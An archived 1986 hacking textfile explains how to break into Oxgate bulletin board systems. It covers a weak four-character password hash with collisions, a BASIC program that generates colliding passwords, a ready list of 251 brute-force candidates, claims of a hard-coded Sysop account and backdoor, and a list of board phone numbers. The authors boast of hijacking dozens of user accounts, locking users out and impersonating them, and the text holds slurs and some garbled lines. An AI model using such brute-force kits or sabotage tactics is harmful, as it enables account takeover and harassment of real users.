💾 Archived View for gemini.spam.works › mirrors › textfiles › phreak › BOXES › hacking.an.oxga captured on 2022-07-17 at 10:39:30.

View Raw

More Information

⬅️ Previous capture (2022-06-12)

-=-=-=-=-=-=-

[!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!]
[!]                                                                     [!]
[!]          Hacking the Oxgate Public Bulletin Board System            [!]
[!]                                                                     [!]
[!]                Written by: The 0mega & Lord Vision                  [!]
[!]                 Infinity's Edge -:- 805/683-2725                    [!]
[!]                     10 Megz.  300/1200 baud                         [!]
[!]                                                                     [!]
[!]                    Call these cool boards:                          [!]
[!]                                                                     [!]
[!]                       The Cartel..........206/825-6236              [!]
[!]                 Metal Land South..........404/327-2327              [!]
[!]              Terrapin Station AE..........505/865-0883              [!]
[!]                                                                     [!]
[!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!][!]

Written Sept. 20, 1986.

     Why am I writing a file on hacking a measly public Bulletin Board System?
There are a few reasons:  Oxgate is probably one of the more popular Public
Bulletin Board Systems for CP/M and MS-DOS systems that is cheap (it supercedes
the archaic RBBS).  Second, I am probably the only person, or one of the few
people who knows the in's and out's of this system and can say that Oxgate will
be the easiest system you will ever hack (providing you know a few key
secrets).  Thirdly, I owe the Author of the program, Paul Traina, something
special.

     A couple of years ago, I was a co-sysop on one of these Oxgate systems,
and did some modding to the Source Code for the Sysop, so I have had the chance
to get to know the system from firsthand experience, and as a Sysop.  After a
while, Traina decided to be an asshole and try and fuck me over a few times
(he's a Jehovah's Witness, what can you expect?)  I'm surprised I haven't
contracted AIDS yet.  But, as it turned out, Traina liked my modds so much, he
decided to snake them from me and put them into his newer source code and
market his program (Oxgate ver. 6).  So for a few reasons, I've decided to
write this file - for informational purposes only, of course.  All the usual
disclaimers apply.  I will assume that you, the reader, have a brain of your
own and are not influenced by subliminal messages in Text files such as these.

SYSTEM OVERVIEW:

     The Oxgate system is mainly based on CP/M systems.  Oxgate also tends to
be the next step up for Sysops running RBBS, RCP/M systems.  At the end of this
article, I will try and list as many of the Oxgate Systems nationally as I can
find.  I'm sure you can find a more extensive list of other Oxgates off of one
of the systems I list.  I will assume some knowledge on the reader's part on
CP/M systems, but I will try and explain as much as I can along the way.

     The Program is divided into 3 separate modules, namely: OXENTR, OXGATE,
and OXEDIT.  OXENTR is the main login program, which accepts password,
username, prints any announcements and goes to OXGATE.  OXGATE is the main BBS
program, which does all the user functions and takes care of the message bases.
OXEDIT is a Sysop utility which allows editing users, masking sub-boards the
user can access, etc.  

     If you do not understand the following decriptions then, you can come back
to them later, after I explain how to get into the CP/M operating System.

     The CP/M system is usually subdivided thusly: 2 areas (or drives), A>, and
B>, each divided into 15 sub-areas, A0> through A14>, and B0> through B14>. All
Sysop utilities will be found either on A14> or B14>.  You enter these areas
simply by typing the Area Name followed by a colon (and a RETURN), for example
"B14:" or "A6:".  Most of the time, the OXGATE will allow the user to drop into
the CP/M operating system, in order to upload/download, etc.  The Normal user
can usually access A0> through A6>, and some lower B> areas.  A0> will contain
the OXGATE.COM file so that a user can return to OXGATE from the Operating
System (by typing "OXGATE"). A14> will usually contain OXENTR to allow the
Sysop (or remote-Sysop) to re-login as another user without having to drop
carrier.  The OXEDIT utility is also to be found in this area.

     At the heart of controlling the CP/M access is a small daemon program
called WHEEL.  WHEEL will watch what areas you try to access and determine
whether you can get in or not.  If a user has the correct password, he can
access all of the areas, change the WHEEL Password, etc.  Once the WHEEL is set
to allow access to the upper areas, you are Sysop, with the control to access
the ERAse command, the OXEDIT utilities, and anything else your heart desires.
WHEEL is a COM file that may be called from any area, and you will usually see
it in A0>.  It may be renamed, of course, so if you are hacking in CP/M, be
aware of that.  To use WHEEL, you simply type "WHEEL password", and the WHEEL
will be set (upon being given the correct password) to let you in to the
restricted areas.

BBS OVERVIEW AND HACKING INTO IT:

     As boring as Oxgates are to me (especially for the countless 'daim
bramaged' users that seem to flock to them), they seem to be popular.  In some
cases, the Sysop will restrict the system so that you cannot gain an account
automatically; you must log on, answer the questions, and then send an SASE.
This tends to discourage users from creating loser accounts, or being 'Twits'
as the term goes (comp: Luser, Ruggie, Dick...)  There is one big disadvantage
to the SASE method that Sysops do not realize, and that I have used severely to
my advantage (I was able to shut down, permanently, an Oxgate and force the
Sysop to 'retire'). So, the only way to get in is to hack in.

     When you log on, it will ask for a user name, however, a user # can be
entered here, as well.  Then it will ask for a password (if that account
exists).  It will let you type a password with an 80 char. limit, however, the
system *ONLY RECOGNIZES THE FIRST FOUR (4) CHARACTERS*.  99% of the users are
ignorant of this, and tend to think if they type in 7 letters, they are more
safe than if they type 5 letters for their password.  And, 99% of the users, in
my experience, use only alphabetical characters.  That narrows the combinations
down considerably to a mere 456,976 (26^4).  You could sit there and try them
all, but there is another little known fact about the way Oxgate saves
passwords that will help considerably.  Namely this:  Traina decided to get
clever (ooh!) and encrypt (tricky!) user passwords with a one-way function (a
one-way function in that you cannot derive the original password from the
encrypted one, and you are not meant to.) into a 4 digit number, repesentative
of the password.  Even when a Sysop uses OXEDIT to look at a user, all he will
see for a password is that 4 digit number.  But, unfortunately for Traina and
the Oxgate Sysops, the way that a password is encrypted, there are 4 other
possible combinations you can type for a password that will be encrypted

examples] "CAQZ", "BAMZ", "BABE", etc, would also be encrypted the same as
"FUCK" is.  As far as Oxgate is concerned all those are the same password.  So
in reality, if a user's password is all alphabetic characters, *THERE ARE ONLY
251 COMBINATIONS* you will have to go through before you get in.  Hayes
Hackamatic with PPP or Intellihacker, each given a textfile with the 251
combinations will easily hack in!  I can hand hack an account in 50 minutes,
max.  And *ALL* Oxgates suffer from this important weakness.  When I was
hacking, the Sysops finally got a clue on life and changed their passwords to
numbers and other characters which make the number of combinations increase,
because they can be combined with alphabetic characters as well.  But, that
didn't stop me.  With the algorithm I will show later on, and a program, you
can generate all the combinations and feed them to your auto-hacker.  The BBS
gives you 3 tries before hanging up.

     If you want to get in as the Sysop, you must, of course, find out his
name.  Just log on and look around, if you can.  All Oxgates have 1 account at
least that will always be there.  The name is, of course, Paul Traina.  The
passwords differ from Oxgate to Oxgate (they are hard-coded into the program),
but the Paul Traina account is *ALWAYS* a Sysop.  A few other important notes:
The Newer Oxgates (version 6 and higher) are compiled; that is to say, the
Sysop *DOES NOT* have the source code, and *CANNOT* alter the BBS in any way
from what it already is, which means he can't put extra programs in there to
discourage hacking.  Paul is really protective about his source code,
especially since the New Oxgates have a backdoor - and that backdoor cancels
the WHEEL allowing him access to all user areas, as well.  I don't,
unfortunately, know what it is or how it works.  Also, (I'm reasonably sure)
the new Oxgates keep track of hack attempts, and the passwords tried - I wrote
the routine.  

     The way I brought a System down was simple.  After hacking a system, (the
Sysop noticed through the hack log) the Sysop instigated the SASE, thinking I
could not gain anymore accounts.  Of course, he wanted to discourage all but
real interested users.  I had, thanks mostly to Rebel, a nearly complete list
of every password used by almost every user in the area.  Since the Lusers
(ahem, I mean 'Users') never change their passwords, it was simple.  I broke
into about 30-45 user accounts and changed their passwords so they could not
log on, then left the accounts to rot.  After a while, it seemed to the Sysop
that nobody was calling anymore, and the user could not even log on to leave a
complaint, and was probably too pissed or lazy to send another SASE.  After
that got boring, I started to put words into users's mouths, so to speak.
Pissed and unable to do anything about all this, the Sysop shut down.

     It should be more than easy for you to break in as the Sysop (or anybody
you want).  There, you can read all private messages, kill messages, access all
sub-boards (16 max) or whatever, but to really have System control, you need to
go to [C]pm (or [J]ump) and be able to gain access to the higher areas.  Once
you can do that, you will be able to use the ERAse command, and just do "ERA

OXEDIT and edit users.  But your real hacking task is in hacking the WHEEL
program.  Once you get the WHEEL password, you will be able to figure out how
to set the password to whatever you want.


[>] Program to Hack Passwords. [<]

/* Alphabetic Passwords range from 2600-3601 /*
/* Modify the Range of the Loop in Line 120  /*
/* To experiment with other combinations     /*

  5  REM THANKS TO MR. AMIGAHEAD FOR HELPING WITH
  6  REM THE ALGORITHM AND THIS PROGRAM.

100  DIM A$(4):D$ =  CHR$ (4):CO = 0
110  HOME : VTAB 12: PRINT  SPC( 15);"HACKING...
115  PRINT D$;"OPEN HACK.FILE": PRINT D$;"WRITE HACK.FILE

116  REM  "STEP 4" IN LINE 120 TO SKIP 4 OF SAME COMBINATION
120  FOR C = 2600 TO 3601 STEP 4
140  FOR X = 1 TO 4:A$(X) = "A": NEXT 
200  REM  ATTACK!
210  GOSUB 5000
220  IF PW < C THEN  GOSUB 1000: GOTO 210
250  FOR X = 1 TO 4: PRINT A$(X);: NEXT 
260 CO = CO + 1: PRINT " ";: IF CO = 10 THEN  PRINT :CO = 0
270  NEXT C: PRINT D$;"CLOSE": VTAB 12: PRINT SPC( 15);"FINISHED...";CHR$ ( 7)
 
1000  REM  INC A$(4)
1010 A$(4) =  CHR$ ( ASC (A$(4)) + 1)
1020  GOSUB 5000
1030  IF  ASC (A$(4)) <  = 90 AND PW < C THEN  RETURN
 
2000  REM  DEC A$(4), INC A$(3)
2010 A$(4) =  CHR$ ( ASC (A$(4)) - 1)
2020 A$(3) =  CHR$ ( ASC (A$(3)) + 1)
2030  GOSUB 5000
2040  IF  ASC (A$(3)) <  = 90 AND PW < C THEN  RETURN
 
3000  REM  DEC A$(3), INC A$(2)
3010 A$(3) =  CHR$ ( ASC (A$(3)) - 1)
3020 A$(2) =  CHR$ ( ASC (A$(2)) + 1)
3030  GOSUB 5000
3040  IF  ASC (A$(2)) <  = 90 AND PW < C THEN  RETURN
 
4000  REM  DEC A$(2), INC A$(1)
4010 A$(2) =  CHR$ ( ASC (A$(2)) - 1)
4020 A$(1) =  CHR$ ( ASC (A$(1)) + 1)
4030  IF  ASC (A$(1)) <  = 90 THEN  RETURN 

5000  REM  EVALUATE PW - THE ENCRYPTION ALGORITHM FOLLOWS
5005  REM  THAT CONVERTS AN ARRAY/4 CHAR STRING TO 4 DIGIT #.
5010 PW = 0
5020  FOR X = 1 TO 4:PW = PW +  ASC (A$(X)) * X * 4: NEXT X
5030  RETURN 
5040 END


[>] LIST OF 251 COMBINATIONS FOR ALPHABETIC PW [<]

/* Produced from above Program /*

AAAA BAAA CAAA BBAA BABA BAAB CAAB BBAB BABB BAAC 
CAAC BBAC BABC BAAD CAAD BBAD BABD BAAE CAAE BBAE 
BABE BAAF CAAF BBAF BABF BAAG CAAG BBAG BABG BAAH 
CAAH BBAH BABH BAAI CAAI BBAI BABI BAAJ CAAJ BBAJ 
BABJ BAAK CAAK BBAK BABK BAAL CAAL BBAL BABL BAAM 
CAAM BBAM BABM BAAN CAAN BBAN BABN BAAO CAAO BBAO 
BABO BAAP CAAP BBAP BABP BAAQ CAAQ BBAQ BABQ BAAR 
CAAR BBAR BABR BAAS CAAS BBAS BABS BAAT CAAT BBAT 
BABT BAAU CAAU BBAU BABU BAAV CAAV BBAV BABV BAAW 
CAAW BBAW BABW BAAX CAAX BBAX BABX BAAY CAAY BBAY 
BABY BAAZ CAAZ BBAZ BABZ CABZ BBBZ BACZ CACZ BBCZ 
BADZ CADZ BBDZ BAEZ CAEZ BBEZ BAFZ CAFZ BBFZ BAGZ 
CAGZ BBGZ BAHZ CAHZ BBHZ BAIZ CAIZ BBIZ BAJZ CAJZ 
BBJZ BAKZ CAKZ BBKZ BALZ CALZ BBLZ BAMZ CAMZ BBMZ 
BANZ CANZ BBNZ BAOZ CAOZ BBOZ BAPZ CAPZ BBPZ BAQZ 
CAQZ BBQZ BARZ CARZ BBRZ BASZ CASZ BBSZ BATZ CATZ
BBTZ BAUZ CAUZ BBUZ BAVZ CAVZ BBVZ BAWZ CAWZ BBWZ
BAXZ CAXZ BBXZ BAYZ CAYZ BBYZ BAZZ CAZZ BBZZ CBZZ
BCZZ CCZZ BDZZ CDZZ BEZZ CEZZ BFZZ CFZZ BGZZ CGZZ
BHZZ CHZZ BIZZ CIZZ BJZZ CJZZ BKZZ CKZZ BLZZ CLZZ
BMZZ CMZZ BNZZ CNZZ BOZZ COZZ BPZZ CPZZ BQZZ CQZZ
BRZZ CRZZ BSZZ CSZZ BTZZ CTZZ BUZZ CUZZ BVZZ CVZZ
BWZZ CWZZ BXZZ CXZZ BYZZ CYZZ BZZZ CZZZ DZZZ EZZZ
FZZZ GZZZ HZZZ IZZZ JZZZ KZZZ LZZZ MZZZ NZZZ OZZZ
PZZZ QZZZ RZZZ SZZZ TZZZ UZZZ VZZZ WZZZ XZZZ YZZZ
ZZZZ


[>] List of Oxgates by Area Code [>]

RCP/M Oxgate 002, Milpitas, CA          408/263-2588
RCP/M Oxgate 012, San Jose, CA          408/378-7474
RCP/M Oxgate-DbaseII, Campbell, CA      408/378-8733
RCP/M Oxgate 001, Saratoga, CA          408/354-5934
RCP/M Oxgate 007, Grafton, VA           804/898-7493
RCP/M Oxgate    , Santa Barbara, CA     805/682-3486
RCP/M Oxgate    , Goleta, CA            805/964-4115

I know there aren't many listed here (obviously, there are at least 12), but in
my rush to finish this article, those were all the ones I could find.  Try
downloading a list of Oxgates off of one of these systems.  If you have any
comments, or questions, you can leave them to The 0mega in [F]eedback on
Infinity's Edge -:- 805/683-2725.

                         The [>]mega
                         Lord Vision
                      Electronic Rebel